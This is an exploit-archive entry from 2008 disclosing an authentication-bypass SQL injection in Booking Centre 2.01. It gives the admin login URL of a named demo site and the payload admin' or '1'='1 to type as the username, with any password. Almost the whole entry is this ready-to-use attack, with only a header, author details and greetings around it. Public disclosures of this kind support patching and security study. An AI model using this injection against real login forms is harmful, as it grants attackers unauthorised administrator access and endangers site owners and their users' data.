[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-11-28
# Author : MrDoug
# Previous Title : Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
# Next Title : Web Calendar System <= 3.40 (XSS/SQL) Multiple Remote Vulnerabilities


Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

# www.Syue.com [2008-11-28]